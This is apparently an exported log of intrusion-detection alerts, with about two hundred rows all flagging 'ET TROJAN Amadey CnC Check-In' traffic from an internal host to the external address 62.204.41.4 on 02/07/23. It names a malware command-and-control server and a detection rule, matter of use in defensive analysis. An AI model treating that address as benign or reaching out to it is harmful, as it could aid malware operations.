                            192.168.2.562.204.41.450131802027700 02/07/23-19:59:02.039230TCP2027700ET TROJAN Amadey CnC Check-In5013180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450385802027700 02/07/23-20:00:12.863067TCP2027700ET TROJAN Amadey CnC Check-In5038580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449766802027700 02/07/23-19:57:21.096100TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450070802027700 02/07/23-19:58:46.903603TCP2027700ET TROJAN Amadey CnC Check-In5007080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449849802027700 02/07/23-19:57:43.984219TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449775802027700 02/07/23-19:57:23.025798TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449858802027700 02/07/23-19:57:49.109185TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449794802027700 02/07/23-19:57:30.288757TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450140802027700 02/07/23-19:59:06.654084TCP2027700ET TROJAN Amadey CnC Check-In5014080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450394802027700 02/07/23-20:00:15.033222TCP2027700ET TROJAN Amadey CnC Check-In5039480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449791802027700 02/07/23-19:57:29.556151TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450042802027700 02/07/23-19:58:37.715383TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450296802027700 02/07/23-19:59:49.030441TCP2027700ET TROJAN Amadey CnC Check-In5029680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450039802027700 02/07/23-19:58:36.996099TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449922802027700 02/07/23-19:58:06.074309TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449880802027700 02/07/23-19:57:54.223863TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449931802027700 02/07/23-19:58:08.920914TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450455802027700 02/07/23-20:00:31.736851TCP2027700ET TROJAN Amadey CnC Check-In5045580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450201802027700 02/07/23-19:59:21.107449TCP2027700ET TROJAN Amadey CnC Check-In5020180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450325802027700 02/07/23-19:59:56.050545TCP2027700ET TROJAN Amadey CnC Check-In5032580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449836802027700 02/07/23-19:57:40.268244TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450366802027700 02/07/23-20:00:08.251401TCP2027700ET TROJAN Amadey CnC Check-In5036680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450449802027700 02/07/23-20:00:30.317849TCP2027700ET TROJAN Amadey CnC Check-In5044980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450242802027700 02/07/23-19:59:33.886857TCP2027700ET TROJAN Amadey CnC Check-In5024280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450414802027700 02/07/23-20:00:20.800586TCP2027700ET TROJAN Amadey CnC Check-In5041480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450112802027700 02/07/23-19:58:57.136239TCP2027700ET TROJAN Amadey CnC Check-In5011280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449877802027700 02/07/23-19:57:53.477790TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449706802027700 02/07/23-19:57:08.141498TCP2027700ET TROJAN Amadey CnC Check-In4970680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449919802027700 02/07/23-19:58:03.999927TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449747802027700 02/07/23-19:57:17.384762TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449788802027700 02/07/23-19:57:28.836185TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450099802027700 02/07/23-19:58:53.985606TCP2027700ET TROJAN Amadey CnC Check-In5009980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450283802027700 02/07/23-19:59:45.895142TCP2027700ET TROJAN Amadey CnC Check-In5028380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450153802027700 02/07/23-19:59:09.775607TCP2027700ET TROJAN Amadey CnC Check-In5015380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450194802027700 02/07/23-19:59:19.434056TCP2027700ET TROJAN Amadey CnC Check-In5019480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450408802027700 02/07/23-20:00:18.376566TCP2027700ET TROJAN Amadey CnC Check-In5040880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449861802027700 02/07/23-19:57:49.861421TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449903802027700 02/07/23-19:57:59.838875TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449991802027700 02/07/23-19:58:23.361807TCP2027700ET TROJAN Amadey CnC Check-In4999180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450058802027700 02/07/23-19:58:41.573761TCP2027700ET TROJAN Amadey CnC Check-In5005880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449950802027700 02/07/23-19:58:13.249773TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449725802027700 02/07/23-19:57:11.991747TCP2027700ET TROJAN Amadey CnC Check-In4972580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449918802027700 02/07/23-19:58:03.708587TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450053802027700 02/07/23-19:58:40.354567TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450344802027700 02/07/23-20:00:01.675171TCP2027700ET TROJAN Amadey CnC Check-In5034480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449823802027700 02/07/23-19:57:37.077825TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450148802027700 02/07/23-19:59:08.546698TCP2027700ET TROJAN Amadey CnC Check-In5014880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450442802027700 02/07/23-20:00:28.613580TCP2027700ET TROJAN Amadey CnC Check-In5044280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449841802027700 02/07/23-19:57:41.479215TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449997802027700 02/07/23-19:58:26.812666TCP2027700ET TROJAN Amadey CnC Check-In4999780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450460802027700 02/07/23-20:00:32.743842TCP2027700ET TROJAN Amadey CnC Check-In5046080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449851802027700 02/07/23-19:57:45.497082TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450264802027700 02/07/23-19:59:39.205304TCP2027700ET TROJAN Amadey CnC Check-In5026480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450025802027700 02/07/23-19:58:33.797119TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450166802027700 02/07/23-19:59:12.953354TCP2027700ET TROJAN Amadey CnC Check-In5016680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450377802027700 02/07/23-20:00:10.926718TCP2027700ET TROJAN Amadey CnC Check-In5037780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450007802027700 02/07/23-19:58:29.284926TCP2027700ET TROJAN Amadey CnC Check-In5000780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450081802027700 02/07/23-19:58:49.575685TCP2027700ET TROJAN Amadey CnC Check-In5008180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450359802027700 02/07/23-20:00:06.547654TCP2027700ET TROJAN Amadey CnC Check-In5035980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450086802027700 02/07/23-19:58:50.782617TCP2027700ET TROJAN Amadey CnC Check-In5008680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450282802027700 02/07/23-19:59:45.658356TCP2027700ET TROJAN Amadey CnC Check-In5028280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450203802027700 02/07/23-19:59:22.078648TCP2027700ET TROJAN Amadey CnC Check-In5020380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449954802027700 02/07/23-19:58:14.184522TCP2027700ET TROJAN Amadey CnC Check-In4995480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449758802027700 02/07/23-19:57:19.484125TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450043802027700 02/07/23-19:58:37.945632TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450002802027700 02/07/23-19:58:27.980529TCP2027700ET TROJAN Amadey CnC Check-In5000280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450221802027700 02/07/23-19:59:28.870563TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449946802027700 02/07/23-19:58:12.312159TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450316802027700 02/07/23-19:59:53.881599TCP2027700ET TROJAN Amadey CnC Check-In5031680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450470802027700 02/07/23-20:00:35.113671TCP2027700ET TROJAN Amadey CnC Check-In5047080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449969802027700 02/07/23-19:58:17.745575TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450020802027700 02/07/23-19:58:32.557219TCP2027700ET TROJAN Amadey CnC Check-In5002080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449928802027700 02/07/23-19:58:08.200692TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450061802027700 02/07/23-19:58:42.609485TCP2027700ET TROJAN Amadey CnC Check-In5006180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449768802027700 02/07/23-19:57:21.340554TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449987802027700 02/07/23-19:58:22.091332TCP2027700ET TROJAN Amadey CnC Check-In4998780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450292802027700 02/07/23-19:59:48.086269TCP2027700ET TROJAN Amadey CnC Check-In5029280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449763802027700 02/07/23-19:57:20.363784TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449964802027700 02/07/23-19:58:16.564709TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450369802027700 02/07/23-20:00:08.954484TCP2027700ET TROJAN Amadey CnC Check-In5036980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450387802027700 02/07/23-20:00:13.346042TCP2027700ET TROJAN Amadey CnC Check-In5038780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449786802027700 02/07/23-19:57:28.358002TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449982802027700 02/07/23-19:58:20.917525TCP2027700ET TROJAN Amadey CnC Check-In4998280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450091802027700 02/07/23-19:58:52.034089TCP2027700ET TROJAN Amadey CnC Check-In5009180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450211802027700 02/07/23-19:59:26.414967TCP2027700ET TROJAN Amadey CnC Check-In5021180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449959802027700 02/07/23-19:58:15.371241TCP2027700ET TROJAN Amadey CnC Check-In4995980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450404802027700 02/07/23-20:00:17.416361TCP2027700ET TROJAN Amadey CnC Check-In5040480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449800802027700 02/07/23-19:57:31.745131TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450033802027700 02/07/23-19:58:35.799544TCP2027700ET TROJAN Amadey CnC Check-In5003380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450030802027700 02/07/23-19:58:35.059294TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450367802027700 02/07/23-20:00:08.484564TCP2027700ET TROJAN Amadey CnC Check-In5036780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450382802027700 02/07/23-20:00:12.143005TCP2027700ET TROJAN Amadey CnC Check-In5038280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450189802027700 02/07/23-19:59:18.468588TCP2027700ET TROJAN Amadey CnC Check-In5018980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450459802027700 02/07/23-20:00:32.490579TCP2027700ET TROJAN Amadey CnC Check-In5045980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449956802027700 02/07/23-19:58:14.672244TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450107802027700 02/07/23-19:58:55.941894TCP2027700ET TROJAN Amadey CnC Check-In5010780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450339802027700 02/07/23-19:59:59.425942TCP2027700ET TROJAN Amadey CnC Check-In5033980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450048802027700 02/07/23-19:58:39.136453TCP2027700ET TROJAN Amadey CnC Check-In5004880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449778802027700 02/07/23-19:57:24.022380TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449892802027700 02/07/23-19:57:57.200519TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450241802027700 02/07/23-19:59:33.653837TCP2027700ET TROJAN Amadey CnC Check-In5024180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450397802027700 02/07/23-20:00:15.752527TCP2027700ET TROJAN Amadey CnC Check-In5039780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450440802027700 02/07/23-20:00:28.144249TCP2027700ET TROJAN Amadey CnC Check-In5044080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450226802027700 02/07/23-19:59:30.062964TCP2027700ET TROJAN Amadey CnC Check-In5022680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449821802027700 02/07/23-19:57:36.603814TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450063802027700 02/07/23-19:58:43.919705TCP2027700ET TROJAN Amadey CnC Check-In5006380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449773802027700 02/07/23-19:57:22.545756TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450318802027700 02/07/23-19:59:54.361124TCP2027700ET TROJAN Amadey CnC Check-In5031880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449913802027700 02/07/23-19:58:02.266316TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449992802027700 02/07/23-19:58:23.691995TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449995802027700 02/07/23-19:58:25.960796TCP2027700ET TROJAN Amadey CnC Check-In4999580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450354802027700 02/07/23-20:00:05.364849TCP2027700ET TROJAN Amadey CnC Check-In5035480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449735802027700 02/07/23-19:57:14.444183TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449776802027700 02/07/23-19:57:23.344979TCP2027700ET TROJAN Amadey CnC Check-In4977680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450432802027700 02/07/23-20:00:26.215534TCP2027700ET TROJAN Amadey CnC Check-In5043280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450313802027700 02/07/23-19:59:53.159401TCP2027700ET TROJAN Amadey CnC Check-In5031380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449854802027700 02/07/23-19:57:48.147586TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450395802027700 02/07/23-20:00:15.267609TCP2027700ET TROJAN Amadey CnC Check-In5039580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450005802027700 02/07/23-19:58:28.753873TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449984802027700 02/07/23-19:58:21.387139TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450176802027700 02/07/23-19:59:15.314802TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449813802027700 02/07/23-19:57:34.897396TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450135802027700 02/07/23-19:59:05.579215TCP2027700ET TROJAN Amadey CnC Check-In5013580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449926802027700 02/07/23-19:58:07.720137TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449707802027700 02/07/23-19:57:08.383912TCP2027700ET TROJAN Amadey CnC Check-In4970780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450071802027700 02/07/23-19:58:47.153403TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450254802027700 02/07/23-19:59:36.757803TCP2027700ET TROJAN Amadey CnC Check-In5025480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450326802027700 02/07/23-19:59:56.296800TCP2027700ET TROJAN Amadey CnC Check-In5032680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450290802027700 02/07/23-19:59:47.592742TCP2027700ET TROJAN Amadey CnC Check-In5029080192.168.2.562.204.41.4
                            192.168.2.562.204.41.449748802027700 02/07/23-19:57:17.627780TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.562.204.41.4
                            192.168.2.562.204.41.449967802027700 02/07/23-19:58:17.264761TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450076802027700 02/07/23-19:58:48.365768TCP2027700ET TROJAN Amadey CnC Check-In5007680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450295802027700 02/07/23-19:59:48.802433TCP2027700ET TROJAN Amadey CnC Check-In5029580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450213802027700 02/07/23-19:59:26.928062TCP2027700ET TROJAN Amadey CnC Check-In5021380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450035802027700 02/07/23-19:58:36.040025TCP2027700ET TROJAN Amadey CnC Check-In5003580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449789802027700 02/07/23-19:57:29.074930TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450056802027700 02/07/23-19:58:41.093535TCP2027700ET TROJAN Amadey CnC Check-In5005680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450145802027700 02/07/23-19:59:07.823731TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449783802027700 02/07/23-19:57:27.313901TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449933802027700 02/07/23-19:58:09.387568TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449961802027700 02/07/23-19:58:15.841480TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.562.204.41.4
                            192.168.2.562.204.41.449844802027700 02/07/23-19:57:42.215376TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450111802027700 02/07/23-19:58:56.896574TCP2027700ET TROJAN Amadey CnC Check-In5011180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450463802027700 02/07/23-20:00:33.458704TCP2027700ET TROJAN Amadey CnC Check-In5046380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450117802027700 02/07/23-19:58:58.328195TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450469802027700 02/07/23-20:00:34.879330TCP2027700ET TROJAN Amadey CnC Check-In5046980192.168.2.562.204.41.4
                            192.168.2.562.204.41.449755802027700 02/07/23-19:57:18.963514TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450200802027700 02/07/23-19:59:20.859043TCP2027700ET TROJAN Amadey CnC Check-In5020080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450206802027700 02/07/23-19:59:23.596825TCP2027700ET TROJAN Amadey CnC Check-In5020680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449951802027700 02/07/23-19:58:13.482140TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450285802027700 02/07/23-19:59:46.406219TCP2027700ET TROJAN Amadey CnC Check-In5028580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449939802027700 02/07/23-19:58:10.592369TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.562.204.41.4
                            192.168.2.562.204.41.450022802027700 02/07/23-19:58:33.047755TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450374802027700 02/07/23-20:00:10.203248TCP2027700ET TROJAN Amadey CnC Check-In5037480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449905802027700 02/07/23-19:58:00.330109TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450196802027700 02/07/23-19:59:19.903167TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450066802027700 02/07/23-19:58:45.929274TCP2027700ET TROJAN Amadey CnC Check-In5006680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450351802027700 02/07/23-20:00:04.658670TCP2027700ET TROJAN Amadey CnC Check-In5035180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450173802027700 02/07/23-19:59:14.605094TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450392802027700 02/07/23-20:00:14.550844TCP2027700ET TROJAN Amadey CnC Check-In5039280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449816802027700 02/07/23-19:57:35.633778TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450262802027700 02/07/23-19:59:38.726303TCP2027700ET TROJAN Amadey CnC Check-In5026280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449793802027700 02/07/23-19:57:30.034311TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450084802027700 02/07/23-19:58:50.307278TCP2027700ET TROJAN Amadey CnC Check-In5008480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449882802027700 02/07/23-19:57:54.716706TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.562.204.41.4
                            192.168.2.562.204.41.450257802027700 02/07/23-19:59:37.493308TCP2027700ET TROJAN Amadey CnC Check-In5025780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449704802027700 02/07/23-19:57:06.319925TCP2027700ET TROJAN Amadey CnC Check-In4970480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449923802027700 02/07/23-19:58:06.395394TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449971802027700 02/07/23-19:58:18.215583TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.562.204.41.4
                            192.168.2.562.204.41.450127802027700 02/07/23-19:59:00.745196TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450323802027700 02/07/23-19:59:55.559779TCP2027700ET TROJAN Amadey CnC Check-In5032380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450412802027700 02/07/23-20:00:19.610273TCP2027700ET TROJAN Amadey CnC Check-In5041280192.168.2.562.204.41.4
                            192.168.2.562.204.41.449727802027700 02/07/23-19:57:12.532928TCP2027700ET TROJAN Amadey CnC Check-In4972780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450168802027700 02/07/23-19:59:13.420495TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450038802027700 02/07/23-19:58:36.760813TCP2027700ET TROJAN Amadey CnC Check-In5003880192.168.2.562.204.41.4
                            192.168.2.562.204.41.450234802027700 02/07/23-19:59:31.956332TCP2027700ET TROJAN Amadey CnC Check-In5023480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449745802027700 02/07/23-19:57:16.898023TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450216802027700 02/07/23-19:59:27.644779TCP2027700ET TROJAN Amadey CnC Check-In5021680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450364802027700 02/07/23-20:00:07.781571TCP2027700ET TROJAN Amadey CnC Check-In5036480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450435802027700 02/07/23-20:00:26.957152TCP2027700ET TROJAN Amadey CnC Check-In5043580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450453802027700 02/07/23-20:00:31.268227TCP2027700ET TROJAN Amadey CnC Check-In5045380192.168.2.562.204.41.4
                            192.168.2.562.204.41.449834802027700 02/07/23-19:57:39.774939TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450346802027700 02/07/23-20:00:03.180456TCP2027700ET TROJAN Amadey CnC Check-In5034680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450050802027700 02/07/23-19:58:39.622154TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450305802027700 02/07/23-19:59:51.225446TCP2027700ET TROJAN Amadey CnC Check-In5030580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450180802027700 02/07/23-19:59:16.281335TCP2027700ET TROJAN Amadey CnC Check-In5018080192.168.2.562.204.41.4
                            192.168.2.562.204.41.450186802027700 02/07/23-19:59:17.709490TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.562.204.41.4
                            192.168.2.562.204.41.450183802027700 02/07/23-19:59:16.984626TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450094802027700 02/07/23-19:58:52.753337TCP2027700ET TROJAN Amadey CnC Check-In5009480192.168.2.562.204.41.4
                            192.168.2.562.204.41.450275802027700 02/07/23-19:59:42.829008TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.562.204.41.4
                            192.168.2.562.204.41.449803802027700 02/07/23-19:57:32.447940TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.562.204.41.4
                            192.168.2.562.204.41.450097802027700 02/07/23-19:58:53.510976TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450015802027700 02/07/23-19:58:31.307259TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450336802027700 02/07/23-19:59:58.703262TCP2027700ET TROJAN Amadey CnC Check-In5033680192.168.2.562.204.41.4
                            192.168.2.562.204.41.449974802027700 02/07/23-19:58:18.969301TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449977802027700 02/07/23-19:58:19.705616TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.562.204.41.4
                            192.168.2.562.204.41.450247802027700 02/07/23-19:59:35.069047TCP2027700ET TROJAN Amadey CnC Check-In5024780192.168.2.562.204.41.4
                            192.168.2.562.204.41.449714802027700 02/07/23-19:57:10.084490TCP2027700ET TROJAN Amadey CnC Check-In4971480192.168.2.562.204.41.4
                            192.168.2.562.204.41.449885802027700 02/07/23-19:57:55.454532TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.562.204.41.4
                            192.168.2.562.204.41.450155802027700 02/07/23-19:59:10.245942TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.562.204.41.4
